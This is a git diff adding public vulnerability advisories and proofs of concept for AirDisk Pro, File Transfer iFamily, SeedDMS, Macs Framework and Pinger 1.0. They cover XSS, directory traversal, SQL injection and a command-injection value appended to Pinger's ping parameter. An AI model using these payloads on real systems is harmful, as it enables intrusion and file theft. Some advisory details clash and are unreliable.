diff --git a/exploits/ios/webapps/48321.txt b/exploits/ios/webapps/48321.txt new file mode 100644 index 000000000..833bae26a --- /dev/null +++ b/exploits/ios/webapps/48321.txt @@ -0,0 +1,417 @@ +# Title: AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor: http://www.app2pro.com +# Software Link: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 +# CVE: N/A + +Document Title: +=============== +AirDisk Pro v5.5.3 iOS - Multiple Persistent Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2203 + + +Release Date: +============= +2020-04-15 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2203 + + +Common Vulnerability Scoring System: +==================================== +4.5 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +File sharing with other iOS devices via Bluetooth or Wi-Fi connection +with automatic search of nearest devices. +Users can perform file operations on the application like: Copy, Move, +Zip, Unzip, Rename, Delete, Email, and more. +Easy to create file like: Text File, New folder, Playlist, Take +Photo/Video, Import From Library, and Voice Record. +AirDisk Pro allows you to store, view and manage files on your iPhone, +iPad or iPod touch. You can connect to AirDisk +Pro from any Mac or PC over the Wi-Fi network and transfer files by drag +& drop files straight from the Finder or Windows +Explorer. AirDisk Pro features document viewer, PDF reader, music +player, image viewer, voice recorder, text editor, file +manager and support most of the file operations: like delete, move, +copy, email, share, zip, unzip and more. + +(Copy of the Homepage: +https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 ) +(Copy of the Homepage: http://www.app2pro.com ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +persistent web vulnerabilities in the AirDisk Pro v5.5.3 ios mobile +application. + + +Affected Product(s): +==================== +Felix Yew +Product: AirDisk Pro v5.5.3 (iOS) + + +Vulnerability Disclosure Timeline: +================================== +2020-04-15: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +No authentication (guest) + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent cross site scripting vulnerability has been +discovered in the official SuperBackup v2.0.5 ios mobile application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise the mobile +web-application from the application-side. + +The first vulnerability is located in the `createFolder` parameter of +the `Create Folder` function. Attackers are able to name +or rename paths via airdisk pro ui to malicious persistent script codes. +Thus allows to execute the persistent injected script +code on the front site of the path index listing in the content itself +on each refresh. The request method to inject is POST +and the attack vector is located on the application-side. Interaction to +exploit is as well possible through the unauthenticated +started ftp service on the local network. + +The second vulnerability is located in the `deleteFile` parameter of the +`Delete` function. The output location with the popup +that asks for permission to delete, allows to execute the script code. +The injection point is the file parameter and the execution +point occurs in the visible delete popup with the permission question. +The request method to inject is POST and the attack vector +is located on the application-side. + +The third web vulnerability is located in the `devicename` parameter +that is displayed on the top next to the airdisk pro ui logo. +Remote attackers are able to inject own malicious persistent script code +by manipulation of the local apple devicename information. +The injection point is the devicename information and the execution +point occurs in the file sharing ui panel of the airdisk pro +mobile web-application. + +Remote attackers are able to inject own script codes to the client-side +requested vulnerable web-application parameters. The attack +vector of the vulnerability is persistent and the request method to +inject/execute is POST. The vulnerabilities are classic client-side +cross site scripting vulnerabilities. Successful exploitation of the +vulnerability results in session hijacking, persistent phishing +attacks, persistent external redirects to malicious source and +persistent manipulation of affected application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] AirDisk pro Wifi UI + +Vulnerable Parameter(s): +[+] createFolder +[+] deleteFile +[+] devicename + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerabilities can be exploited by +remote attackers with wifi access with low user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +1. Create Folder + +PoC: Vulnerable Source + +
+test11 Apr 2020 at 12:35Folder +  + + + +test>" + + +PoC: Vulnerable Source (Listing - Index) + + +

Contacts 09:17:12:PM 10:Apr.:2020 .vcf

+ +

26.40 KB

+ + + + + + + + +PoC: Exception-Handling +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts >" +09:17:12:PM 10:Apr.:2020 .vcf" +- +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts 09:17:12:PM 10:Apr.:2020 >" .vcf" +- +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts >"09:17:12:PM 10:Apr.:2020 .vcf" + + +PoC: Exploit +BEGIN:VCARD +VERSION:3.0 +PRODID:-//Apple Inc.//iPhone OS 12.4.5//EN +B:Kunz Mejri ;>" ;;; +END:VCARD + + +--- PoC Session Logs [POST] --- +http://localhost/move +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 187 +Origin: http://localhost +Connection: keep-alive +Referer: http://localhost/ +oldPath=/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf&newPath=/evil-filename>".vc +- +POST: HTTP/1.1 500 Internal Server Error +Content-Length: 593 +Content-Type: text/html; charset=utf-8 +Connection: Close +Server: GCDWebUploader +- +http://localhost/evil.source +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer: http://localhost/ +- +GET: HTTP/1.1 200 OK +Server: GCDWebUploader +Connection: Close + + +Solution - Fix & Patch: +======================= +1. Parse and filter the vcf name values next to add, edit or imports to +prevent an execution +2. Restrict and filter in the index listing the vcf names to sanitize +the output + + +Security Risk: +============== +The security risk of the persistent vcf cross site scripting web +vulnerability is estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/ios/webapps/48327.txt b/exploits/ios/webapps/48327.txt new file mode 100644 index 000000000..6063109bf --- /dev/null +++ b/exploits/ios/webapps/48327.txt @@ -0,0 +1,245 @@ +# Title: File Transfer iFamily 2.1 - Directory Traversal +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Software Link: http://www.dedecms.com/products/dedecms/downloads/ +# CVE: N/A + +Document Title: +=============== +File Transfer iFamily v2.1 - Directory Traversal Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2199 + + +Release Date: +============= +2020-04-14 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2199 + + +Common Vulnerability Scoring System: +==================================== +7.1 + + +Vulnerability Class: +==================== +Directory- or Path-Traversal + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Send photos, videos and documents to other devices without Internet. A +complete application to exchange files +wirelessly between devices. It uses the Multipeer Connectivity Framework +to search and connect to available devices, +without the need of internet connection or any kind of server and database. + +(Copy of the Homepage: +https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575 +) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a directory +traversal web vulnerability in the official File Transfer iFamily v2.1 +ios mobile application. + + +Affected Product(s): +==================== +DONG JOO CHO +Product: File Transfer iFamily v2.1 - iOS Mobile Web Application + + +Vulnerability Disclosure Timeline: +================================== +2020-04-14: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Pre auth - no privileges + + +User Interaction: +================= +No User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +A directory traversal web vulnerability has been discovered in the +official File Transfer iFamily v2.1 ios mobile application. +The vulnerability allows remote attackers to change the application path +in performed requests to compromise the local application +or file-system of a mobile device. Attackers are for example able to +request environment variables or a sensitive system path. + +The directory-traversal web vulnerability is located in the main +application path request performed via GET method. Attackers are +able to request for example the local ./etc/ path of the web-server by +changing the local path in the performed request itself. +In a first request the attack changes the path, the host redirects to +complete the adress with "..". Then the attacker just +attaches a final slash to its request and the path can be accessed via +web-browser to download local files. + +Exploitation of the directory traversal web vulnerability requires no +privileged web-application user account or user interaction. +Successful exploitation of the vulnerability results in information +leaking by unauthorized file access and mobile application compromise. + + +Proof of Concept (PoC): +======================= +The directory traversal vulnerability can be exploited by attackers with +access to the wifi interface in a local network without user interaction. +For security demonstration or to reproduce the security vulnerability +follow the provided information and steps below to continue. + + +PoC: Exploitation +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +http://localhost//../ + + +--- PoC Session Logs [GET]] --- +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 2521 +- +http://localhost../etc/ +Host: localhost.. +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- add slash to correct host adress (/.././) +http://localhost/./ +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- Access granted +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +GET: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 2521 + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a restriction of the visible and +accessable ./etc/ path in the app container. +Disallow path changes in the client-side get method requests and +validate them securely. + + +Security Risk: +============== +The security risk of the directory travsersal web vulnerability in the +ios mobile application is estimated as high. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ \ No newline at end of file diff --git a/exploits/php/webapps/48323.txt b/exploits/php/webapps/48323.txt new file mode 100644 index 000000000..e6038c894 --- /dev/null +++ b/exploits/php/webapps/48323.txt @@ -0,0 +1,75 @@ +# Title: Pinger 1.0 - Remote Code Execution +# Date: 2020-04-13 +# Author: Milad Karimi +# Vendor Homepage: https://github.com/wcchandler/pinger +# Software Link: https://github.com/wcchandler/pinger +# Tested on: windows 10 , firefox +# Version: 1.0 +# CVE : N/A + +================================================================================ +Pinger 1.0 - Simple Pinging Webapp Remote Code Execution +================================================================================ +# Vendor Homepage: https://github.com/wcchandler/pinger +# Software Link: https://github.com/wcchandler/pinger +# Date: 2020.04.13 +# Author: Milad Karimi +# Tested on: windows 10 , firefox +# Version: 1.0 +# CVE : N/A +================================================================================ +# Description: +simple, easy to use jQuery frontend to php backend that pings various +devices and changes colors from green to red depending on if device is +up or down. + +# PoC : + +http://localhost/pinger/ping.php?ping=;echo '' >info.php +http://localhost/pinger/ping.php?socket=;echo '' >info.php + + +# Vulnerabile code: + + if(isset($_GET['ping'])){ + // if this is ever noticably slower, i'll pass it stuff when called + // change the good.xml to config.xml, good is what I use at $WORK + $xml = simplexml_load_file("config.xml"); + //$xml = simplexml_load_file("good.xml"); + if($_GET['ping'] == ""){ + $host = "127.0.0.1"; + }else{ + $host = $_GET['ping']; + } + $out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout + .' '.$host.' | grep received | awk \'{print $4}\'')); + $id = str_replace('.','_',$host); + + if(($out == "1") || ($out == "0")){ + echo json_encode(array("id"=>"h$id","res"=>"$out")); + }else{ + ## if it returns nothing, assume network is messed up + echo json_encode(array("id"=>"h$id","res"=>"0")); + } + } + + if(isset($_GET['socket'])){ + $xml = simplexml_load_file("config.xml"); + //$xml = simplexml_load_file("good.xml"); + if($_GET['socket'] == ""){ + $host = "127.0.0.1 80"; + }else{ + $host = str_replace(':',' ',$_GET['socket']); + } + $out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1'); + $id = str_replace('.','_',$host); + $id = str_replace(' ','_',$id); + if(preg_match("/succeeded/",$out)){ + echo json_encode(array("id"=>"h$id","res"=>"1")); + }else{ + ## if it returns nothing, assume network is messed up + echo json_encode(array("id"=>"h$id","res"=>"0")); + } + } + + ?> \ No newline at end of file diff --git a/exploits/php/webapps/48324.txt b/exploits/php/webapps/48324.txt new file mode 100644 index 000000000..b44c3167f --- /dev/null +++ b/exploits/php/webapps/48324.txt @@ -0,0 +1,352 @@ +# Title: SeedDMS 5.1.18 - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor: https://www.seeddms.org +# Software Link: https://www.seeddms.org/index.php?id=7 +# CVE: N/A + +Document Title: +=============== +SeedDMS v5.1.18 - Multiple Persistent Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2209 + + +Release Date: +============= +2020-04-15 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2209 + + +Common Vulnerability Scoring System: +==================================== +4.3 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +SeedDMS is a free document management system with an easy to use web +based user interface. It is based on PHP and +MySQL or sqlite3 and runs on Linux, MacOS and Windows. Many years of +development has made it a mature, powerful +and enterprise ready platform for sharing and storing documents. It's +fully compatible with its predecessor LetoDMS. + +(Copy of the Homepage: https://www.seeddms.org/index.php?id=2 & +https://www.seeddms.org/index.php?id=7 ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +persistent vulnerabilities in the SeedDMS v5.1.16 & v5.1.18 web-application. + + +Affected Product(s): +==================== +Uwe Steinmann +Product: SeedDMS - Content Management System v4.3.37, v5.0.13, v5.1.14, +v5.1.16, v5.1.18 and v6.0.7 + + +Vulnerability Disclosure Timeline: +================================== +2020-04-15: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted authentication (user/moderator) - User privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent cross site web vulnerabilities has been discovered +in the SeedDMS v4.3.37, v5.0.13, v5.1.14 and v6.0.7 web-application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser to +web-application requests from the application-side. + +The persistent cross site scripting web vulnerabilities are located in +the `name` and `comment` parameter of the `AddEvent.php` file. +Remote attackers are able to add an own event via op.AddEvent with +malicious script codes. The request method to inject is POST +and the attack vector is located on the application-side. After the +inject the execution occurs in the admin panel within the +`Log Management` - `Webdav` and `Web` on view. The content of the +comment and name is unescaped pushed inside of the logs with +a html/js template. Thus allows an attacker to remotly exploit the issue +by a simple post inject from outside with lower privileges. + +Successful exploitation of the vulnerability results in session +hijacking, persistent phishing attacks, persistent external redirects +to malicious source and persistent manipulation of affected or connected +application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] op.AddEvent (AddEvent.php) + +Vulnerable Parameter(s): +[+] name +[+] comment + +Affected Module(s): +[+] Log Management (out.LogManagement.php) + + +Proof of Concept (PoC): +======================= +The persistent web vulnerability can be exploited by remote attackers +with low privileged web-application user account and low user interaction. +For security demonstration or to reproduce the security web +vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Start your local webbrowser and tamper the http protocol session +2. Open the AddEvent.php and add a new event +3. Insert your script code test payload inside the Name or Comments path +4. Save or submit the entry with error +Note: Now the web and webdav log has captured the insert or erro +5. Now wait until the administrator previews in the log management the +web or webdav view function +6. Successful reproduce of the persistent web vulnerability! + + +PoC: Vulnerable Source (Log Management - View) +
Apr 13 19:23:22  [info] admin (localhost) op.RemoveLog
+?logname=20200413.log
+Apr 13 19:29:53  [info] admin (localhost) op.AddEvent ?name="
+&comment=&from=1586728800&to=1586815199
+
+ + +PoC: Payload +>" + + +--- PoC Session Logs (POST) --- +https://SeedDMS.localhost:8080/out/out.AddEvent.php +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=y +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.25 (Debian) +Vary: Accept-Encoding +Content-Encoding: gzip +Content-Length: 2973 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +- +https://SeedDMS.localhost:8080/op/op.AddEvent.php +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 356 +Origin: https://SeedDMS.localhost:8080 +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.AddEvent.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +from=2020-04-13&to=2020-04-13 +&name=>"&comment=>" +- +POST: HTTP/1.1 302 Found +Server: Apache/2.4.25 (Debian) +Location: ../out/out.Calendar.php?mode=w&day=13&year=2020&month=04 +Content-Length: 0 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +Note: Injection Point via Calender op.AddEvent Name & Comment + + + +--- PoC Session Logs (GET) --- +https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=20200413.log +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: text/html, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +X-Requested-With: XMLHttpRequest +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.25 (Debian) +Vary: Accept-Encoding +Content-Encoding: gzip +Content-Length: 273 +Keep-Alive: timeout=5, max=94 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 +- +https://SeedDMS.localhost:8080/out/evil.source +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 302 Found +Server: Apache/2.4.25 (Debian) +Location: /out/out.ViewFolder.php +Content-Length: 0 +Keep-Alive: timeout=5, max=93 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +Note: Execution Point via Log Management (AP) on Webdav View or Web View + + + +Reference(s): +https://SeedDMS.localhost:8080/ +https://SeedDMS.localhost:8080/op/op.AddEvent.php +https://SeedDMS.localhost:8080/out/out.ViewFolder.php +https://SeedDMS.localhost:8080/out/out.AddEvent.php +https://SeedDMS.localhost:8080/out/out.LogManagement.php +https://SeedDMS.localhost:8080/out/out.Calendar.php?mode= +https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname= + + +Solution - Fix & Patch: +======================= +1. Parse and escape the name and comment input field on transmit to sanitize +2. Filter and restrict the input field of the name and comments +parameter for special chars to prevent injects +3. Parse the output location of all web and webdav logfiles to prevent +the execution point + + +Security Risk: +============== +The security risk of the persistent cross site web vulnerabilities in +the seeddms web-application are estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/php/webapps/48325.txt b/exploits/php/webapps/48325.txt new file mode 100644 index 000000000..0cb46c90a --- /dev/null +++ b/exploits/php/webapps/48325.txt @@ -0,0 +1,482 @@ +# Title: Macs Framework 1.14f CMS - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Software Link: https://sourceforge.net/projects/macs-framework/files/latest/download +# CVE: N/A + +Document Title: +=============== +Macs Framework v1.14f CMS - Multiple Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2206 + + +Release Date: +============= +2020-04-14 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2206 + + +Common Vulnerability Scoring System: +==================================== +7.4 + + +Vulnerability Class: +==================== +Multiple + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Macs CMS is a Flat File (XML and SQLite) based AJAX Content Management +System. It focuses mainly on the +Edit In Place editing concept. It comes with a built in blog with +moderation support, user manager section, +roles manager section, SEO / SEF URL. +https://sourceforge.net/projects/macs-framework/files/latest/download + +(Copy of the Homepage: https://sourceforge.net/projects/macs-framework/ ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple web +vulnerabilities in the official Macs Framework v1.1.4f CMS. + + +Affected Product(s): +==================== +Macrob7 +Product: Macs Framework v1.14f - Content Management System + + +Vulnerability Disclosure Timeline: +================================== +2020-04-14: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Restricted authentication (user/moderator) - User privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +1.1 & 1.2 +Multiple non-persistent cross site scripting web vulnerabilities has +been discovered in the official Mac Framework v1.1.4f Content Managament +System. +The vulnerability allows remote attackers to manipulate client-side +browser to web-applicatio requests to compromise user sesson credentials +or to +manipulate module content. + +The first vulnerability is located in the search input field of the +search module. Remote attackers are able to inject own malicious script +code as +search entry to execute the code within the results page that is loaded +shortly after the request is performed. The request method to inject is +POST +and the attack vector is located on the client-side with non-persistent +attack vector. + +The second vulnerability is located in the email input field of the +account reset function. Remote attackers are able to inject own +malicious script code as +email to reset the passwort to execute the code within performed +request. The request method to inject is POST and the attack vector is +located on the +client-side with non-persistent attack vector. + +Successful exploitation of the vulnerabilities results in session +hijacking, non-persistent phishing attacks, non-persistent external +redirects to +malicious source and non-persistent manipulation of affected or +connected application modules. + +Request Method(s): +[+] POST + +Vulnerable Parameter(s): +[+] searchString +[+] emailAdress + + +1.3 +Multiple remote sql-injection web vulnerabilities has been discovered in +the official Mac Framework v1.1.4f Content Managament System. +The vulnerability allows remote attackers to inject or execute own sql +commands to compromise the dbms or file system of the application. + +The sql injection vulnerabilities are located in the `roleId` and +`userId` of the `editRole` and `deletUser` module. The request method to +inject or execute commands is GET and the attack vector is located on +the application-side. Attackers with privileged accounts to edit are +able to inject own sql queries via roleid and userid on deleteUser or +editRole. Multiple unhandled and broken sql queries are visible as default +debug to output for users as well. + +Exploitation of the remote sql injection vulnerability requires no user +interaction and a privileged web-application user account. +Successful exploitation of the remote sql injection results in database +management system, web-server and web-application compromise. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] deleteUser 